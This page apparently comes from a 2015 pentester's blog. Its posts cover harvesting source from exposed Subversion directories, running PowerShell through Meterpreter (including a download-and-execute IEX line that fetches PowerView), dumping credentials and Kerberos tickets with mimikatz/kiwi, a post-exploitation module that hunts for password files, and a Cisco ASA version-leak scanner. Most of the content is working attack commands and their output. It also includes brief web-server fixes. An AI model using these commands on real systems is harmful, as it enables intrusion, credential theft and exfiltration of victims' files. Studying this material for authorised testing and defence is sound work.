Monday, March 2, 2015

DevOoops: Revision Control (Subversion)

Subversion 1.6 (and earlier)

Check for .entries files

Walk svn chain to retrieve source

Example:
http://somedomain.com/.svn/text-base/index.php.svn-base
http://somedomain.com/.svn/entries

Metasploit Auxiliary Module:
auxiliary/scanner/http/svn_scanner


msf auxiliary(svn_scanner) > run

[*] Using code '404' as not found.
[+] [1.2.3.52:80] SVN Entries file found.
[*] [1.2.3.52] dir CURRENT [dw394]
[*] - Trying to get file rss2html2.php source code.
[*] - Location: /.svn/text-base/rss2html2.php.svn-base
[*]


Fatal error:  Call to undefined function FeedForAll_scripts_readFile() in /usr/local/apache2-marketing/htdocs/.svn/text-base/rss2html2.php.svn-base on line 772
---SNIP---
[*] Done. 175 records.
[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Unfortunately web servers will usually catch the php and try to render it for you :-(



Once you have the source you look for config files or interesting things in the source code

Example:



Subversion 1.7 and later

Working copy and changes stored in a sqlite database

Example:
http://www.somedomain.com/.svn/wc.db

Metasploit Auxiliary Module:
auxiliary/scanner/http/svn_wcdb_scanner



From the SANS link below example to pull out files on the server

"We have the file name and the SHA1 used by Subversion. With a little SQL-Kung-Fu, we can create a mapping of files used by the application and the files as stored by Subversion."

$ sqlite3 wc.db 'select local_relpath, ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" as alpha from NODES;'
index.php|.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base
scripts/menu.js|.svn/pristine/fa/fabeb3ba6a96cf0cbcad1308abdbe0c2427eeebf.svn-base
style/style.js|.svn/pristine/2s/2cc5590e0ba024c3db77a13896da09b39ea74799.svn-base
...


Anything with a .svn/pristine should be downloadable:

$ wget -O - http://www.sometarget.tgt/.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base
<?php
// This is the index.php file
...

Example:





Great reference for the above:

http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us

Other blog posts on the subject:

https://blog.netspi.com/parsing-svn-entries-files-with-powershell/

Fixes (quick Google searches, didnt test)

Apache



or

RedirectMatch permanent .*\.(svn|git|hg|bzr|cvs)/.* /


nginx

location ~ /.svn/ {
  deny all;
}

.htaccess

RedirectMatch 404 (?i)\.svn

IIS
couple answers here, although none marked as "the answer"
http://serverfault.com/questions/23340/ignoring-svn-directories-under-iis

also http://www.petefreitag.com/item/823.cfm (Great site BTW)


Monday, February 23, 2015

Running PowerShell Scripts That Require Module Imports With Meterpreter

Old post on the subject here:

http://carnal0wnage.attackresearch.com/2012/10/run-powershell-module-in-meterpreter.html

More recent posts on the subject by harmj0y

http://www.harmj0y.net/blog/powershell/derbycon-powershell-weaponization/


Anyway, #2 from The PowerShell Weaponization Problem works ok if you don't care about the code being on disk

Gist with the command

meterpreter > shell
Process 2380 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.


C:\Users\user\Desktop>powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
UNLUCKYCOMPANY.COM
C:\Users\user\Desktop>


Via IEX download method: Gist with the command

C:\Users\user\Desktop>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
UNLUCKYCOMPANY.COM

C:\Users\user\Desktop>

Friday, February 20, 2015

Powershell dumping all certs in the cert store

Put this on twitter just posting it here so I can find it later.

You can use powershell to list all the certificates on a host

powershell -Command Get-ChildItem -Recurse Cert: > certs.txt

If you are searching for something specific you can pass to findstr

powershell -Command Get-ChildItem -Recurse Cert: | findstr -i Superfish


Monday, February 16, 2015

My GoldDigger Script

Awhile back I created a post module that would index various types of file types so I could more quickly find and decide if i wanted to do download potentially useful files.

I like to look for the passwords.txt/passwords.xls/passwords.doc in addition to other configuration files. Finding and reviewing these can be a bit tedious on the command line.

The script is based on the enum_files  post module and it will let you pick the extensions you are interested in as well as which drive to search. Instead of just downloading all those files it creates two output files per file type (in loot). One file that is easy to read and a second that is easy to cut in paste into your meterpreter console to download any files you find interesting.

msf use post/windows/gather/gold_digger
msf post(gold_digger) > info

       Name: Windows Gather Generic File Collection
     Module: post/windows/gather/gold_digger
   Platform: Windows
       Arch:
       Rank: Normal

Provided by:
  3vi1john
  RageLtMan
  CG

Description:
  This module looks for all office files, creates a list and the path
  to those files to download later if you want (check your loot
  folder). Based on enum_files.rb. Creates two output files in loot.
  one with the raw path and second that is more readable. Notes: Does
  not decend into Users\$user\AppData by default (not sure why). You
  have to force that directory with the SEARCH_FROM option.


msf post(gold_digger) > show options

Module options (post/windows/gather/gold_digger):

   Name         Current Setting             Required  Description
   ----         ---------------             --------  -----------
   FILE_GLOBS   *.doc*,*.xls*,*.ppt*,*.pdf  yes       The file pattern to search for in a filename
   SEARCH_FROM                              no        Search from a specific location. Ex. C:\
   SESSION                                  yes       The session to run this module on.


In action:


[*] Searching C:\Users\ for *.doc* through windows user profile structure
[*] Found C:\Users\user\Documents\Derbycon3.docx adding to the list
[*] Found C:\Users\user\Documents\Speaker Attachments.docx adding to the list
[*] Found C:\Users\user\Desktop\runroute.doc adding to the list
...

[*] Searching C:\Users\ for *.xls* through windows user profile structure
[*] Found C:\Users\user\Documents\servers.xlsx adding to the list

...

[*] Searching C:\Users\ for *.pdf* through windows user profile structure
[*] Found C:\Users\user\Desktop\scan.pdf adding to the list
...
[*] Done!
[*] Post module execution completed


Of course you can also give it full drives like C:\\ or X:\\ or change extensions you are looking for.

You can get it here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/modules/post/windows/gather/gold_digger.rb

Tuesday, February 10, 2015

MSF's + Mimikatz + Windows 8.1 part two

I love twitter. OJ replied to me about my metasploit+mimikatz+Windows 8.1 post


Looks like mimikatz 2.0 IS in msf, its just under the use kiwi functionality

meterpreter > use kiwi
Loading extension kiwi...

  .#####.   mimikatz 2.0 alpha (x64/win64) release "Kiwi en C"
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */

success.

meterpreter > help
Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials
    creds_kerberos         Retrieve Kerberos creds
    creds_livessp          Retrieve LiveSSP creds
    creds_msv              Retrieve LM/NTLM creds (hashes)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds
    creds_wdigest          Retrieve WDigest creds
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    lsa_dump               Dump LSA secrets
    wifi_list              List wifi profiles/creds

I wasn't able to get the hashes with any of the creds_* modules but lsa_dump and kerberos functionality seemed to be working like it should.

HTH for future pentests.

-CG


Monday, February 9, 2015

MSF's Mimikatz doesnt work on Windows 8.1 what can you do?


So you are on a Windows 8.1 box. You go to run the trusty mimikatz-->wdigest and it fails.

Well technically it will work but there wont be anything there


Using the current mimikatz that ships with metasploit (as of 1/16/2015) will not return anything. This is because 8.1 doesn't keep passwords in memory any more.

However, you should still be able to get hashes and kerberos tickets

The current standalone version of mimikatz will do this

https://github.com/gentilkiwi/mimikatz/releases/

and using the

mimikatz # sekurlsa::logonpasswords

https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa



Dumping kerberos tickets should also work

mimikatz # sekurlsa::tickets /export
minidump should also work

Monday, February 2, 2015

Cisco ASA version grabber (CVE-2014-3398)

Was catching up on blogs and re-reading some things and re-came across this blog post and Ruxcon slides
http://breenmachine.blogspot.com/2014/10/cisco-asa-ssl-vpn-backdoor-poc-cve-2014.html
https://ruxcon.org.au/assets/2014/slides/Breaking%20Bricks%20Ruxcon%202014.pdf

While looking for some of the POCs I found this separate issue:

http://blog.spiderlabs.com/2014/04/privilege-escalation-vulnerability-in-cisco-asas-ssl-vpn.html

https://www3.trustwave.com/spiderlabs/advisories/TWSL2014-005.txt

Demo Video
https://vimeo.com/93010946

Slide deck
https://speakerdeck.com/claudijd/crowdsourcing-your-cisco-firewall-administration-dot-dot-dot-wat

The more important part of this was (for me) how to identify the vulnerable versions of ASAs

From the SpiderLabs post:

Cisco ASA administrators can remediate this vulnerability by applying the latest firmware for your appliance. Depending on the ASA model you will want to upgrade to at least version 8.2(5.48), 8.3(2.40), 8.4(7.15), 8.6(1.13), 8.7(1.11), 9.0(4.1), or 9.1(4.5).

 If you check out the Ruxcon slides (slide 75) you'll see that Alec discovered a version disclosure issue (CVE-2014-3398)



I couldn't find the nmap NSE referenced.

**UPDATE**
here it is: https://github.com/alec-stuart/BreakingBricks
**UPDATE**

aaaaannnd given that it's just a GET request, I wrote an auxiliary module to do this check:

https://github.com/carnal0wnage/Metasploit-Code/blob/master/modules/auxiliary/scanner/cisco_asa_version_leak.rb

Sample output

msf > use auxiliary/dev/webapp/cisco_asa_version_leak
msf auxiliary(cisco_asa_version_leak) > set VERBOSE true
VERBOSE => true
msf auxiliary(cisco_asa_version_leak) > set RHOSTS vpn.host1
RHOSTS => vpn.host1
msf auxiliary(cisco_asa_version_leak) > run

[+] 1.1.1.1:443-ASA Version: 9.0(3)8
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(cisco_asa_version_leak) > set RHOSTS vpn.host2
RHOSTS => vpn.host2
msf auxiliary(cisco_asa_version_leak) > run

[+] 2.2.2.2:443-ASA Version: 9.1(5)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(cisco_asa_version_leak) > set RHOSTS vpn.host3
RHOSTS => vpn.host3
msf auxiliary(cisco_asa_version_leak) > run

[+] 3.3.3.3:443-ASA Version: 8.4(7)22
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(cisco_asa_version_leak) > set RHOSTS vpn.host4
RHOSTS => vpn.host4
msf auxiliary(cisco_asa_version_leak) > run

[*] 4.4.4.4:443 Received 302 to https://129.78.208.25/+webvpn+/index.html (PATCHED)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


I also found this nmap script

http://nmap.org/nsedoc/scripts/http-cisco-anyconnect.html

but I checked against the above hosts and it didnt return any results :-/ so meh.


quick check just as a place to put it

curl -ssl -k  -v "https://1.2.3.4/CSCOSSLC/config-auth"

other fun

inurl:logon.html "CSCOE"

P.S.
the module to actually exploit the issue is in metasploit:
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb

At some point I may try to just add the check to that module until then you have the above.